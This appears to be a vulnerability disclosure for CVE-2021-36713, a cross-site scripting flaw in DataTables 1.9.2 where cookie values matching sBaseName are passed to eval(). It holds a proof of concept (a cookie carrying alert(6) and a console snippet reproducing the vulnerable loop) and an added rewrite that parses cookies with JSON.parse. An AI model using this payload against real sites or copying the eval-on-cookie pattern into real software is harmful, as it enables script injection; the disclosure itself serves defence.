@walhajri
Last active January 7, 2024 10:01
CVE-2021-36713 Publication

Cross-Site Scripting (XSS) Vulnerability

Description:

DataTables is a table enhancing plug-in for the jQuery Javascript library, adding sorting, paging and filtering abilities to plain HTML tables with minimal effort.

This vulnerability was found during a penetration testing assessment of a website that used the DataTables library.

Impact

If a website developer exposes the sBaseName parameter of the DataTables function _fnCreateCookie to user-controlled input, a malicious user can execute JavaScript code through it, because every cookie whose text matches sBaseName is passed to eval().

Vulnerability path:

_fnCreateCookie ( sName, sValue, iSecs, sBaseName, fnCallback )

var aCookies = document.cookie.split(';');

var aSplitCookie = aCookies[i].split('=');

try { oData = eval( '('+decodeURIComponent(aSplitCookie[1])+')' ); }

Affected target

This vulnerability was found in version 1.9.2, in the vulnerable function _fnCreateCookie.

Proof of Concept (PoC)

  • Browse to this URL: https://cdn.datatables.net/1.9.2/js/jquery.dataTables.js
  • Add a cookie with the name "XSS" and the value "alert(6)" (the vulnerability occurs only if sBaseName is exposed).
  • To demonstrate the behaviour of this library, open the console tab of the developer tools, paste the code below and run it; an alert dialog will appear.

Below is the code snippet from line 4405 to line 4423 of jquery.dataTables.js (with a console.log added for the demonstration):

var sBaseName = 'XSS'; // if this variable is exposed then the website will be vulnerable to XSS
var oData, sOldName, iOldTime; // declared here so the snippet runs stand-alone in the console
var aCookies = document.cookie.split(';');
for ( var i=0, iLen=aCookies.length ; i<iLen ; i++ )
{
    console.log(aCookies[i].indexOf(sBaseName));
    if ( aCookies[i].indexOf( sBaseName ) != -1 )
    {
        /* It's a DataTables cookie, so eval it and check the time stamp */
        var aSplitCookie = aCookies[i].split('=');
        try { oData = eval( '('+decodeURIComponent(aSplitCookie[1])+')' ); } // Vulnerable sink: the cookie value is executed as code
        catch( e ) { continue; }
        if ( oData.iCreate && oData.iCreate < iOldTime )
        {
            sOldName = aSplitCookie[0];
            iOldTime = oData.iCreate;
        }
    }
}
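As an added example (not the gist's or DataTables' own code), here is the same cookie scan written without eval: the cookie name is matched as a prefix instead of searching the whole "name=value" string, and the value goes through JSON.parse, which rejects executable text such as alert(6). The cookie string, the cookie names and the function name are constructed for this demonstration.

```javascript
// Added example, not DataTables code: the _fnCreateCookie cookie scan
// rewritten so that cookie values are parsed as data, never executed.
function parseDtCookiesSafely(cookieString, sBaseName) {
  var found = [];
  var aCookies = cookieString.split(';');
  for (var i = 0; i < aCookies.length; i++) {
    var sCookie = aCookies[i].trim();
    var iEq = sCookie.indexOf('=');
    if (iEq === -1) { continue; }
    var sName = sCookie.slice(0, iEq);
    var sRaw = sCookie.slice(iEq + 1);
    // Match the cookie *name* against the base name; the original
    // indexOf() on the whole "name=value" string also matched values.
    if (sName.indexOf(sBaseName) !== 0) { continue; }
    var oData;
    try {
      // JSON.parse only accepts data: "alert(6)" throws a SyntaxError here
      oData = JSON.parse(decodeURIComponent(sRaw));
    } catch (e) {
      continue; // malformed or non-JSON cookie: ignore it, never execute it
    }
    if (oData && typeof oData === 'object' && typeof oData.iCreate === 'number') {
      found.push({ name: sName, iCreate: oData.iCreate });
    }
  }
  return found;
}

// Same "find the oldest DataTables cookie" logic as the original loop,
// built on the safe parser.
function oldestDtCookieName(cookieString, sBaseName) {
  var entries = parseDtCookiesSafely(cookieString, sBaseName);
  var sOldName = null, iOldTime = Infinity;
  for (var i = 0; i < entries.length; i++) {
    if (entries[i].iCreate < iOldTime) {
      sOldName = entries[i].name;
      iOldTime = entries[i].iCreate;
    }
  }
  return sOldName;
}

// Constructed sample cookies: two genuine state cookies, one cookie carrying
// the payload from the PoC, and one whose *value* merely contains the base name.
var SAMPLE_COOKIES =
  'SpryMedia_DataTables_a=' + encodeURIComponent('{"iCreate":1700000000000,"iStart":0}') +
  '; SpryMedia_DataTables_b=' + encodeURIComponent('{"iCreate":1600000000000,"iStart":10}') +
  '; XSS=' + encodeURIComponent('alert(6)') +
  '; other=' + encodeURIComponent('SpryMedia_DataTables_nope');
```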

Discoverer

Waleed Ibrahim Alhajri
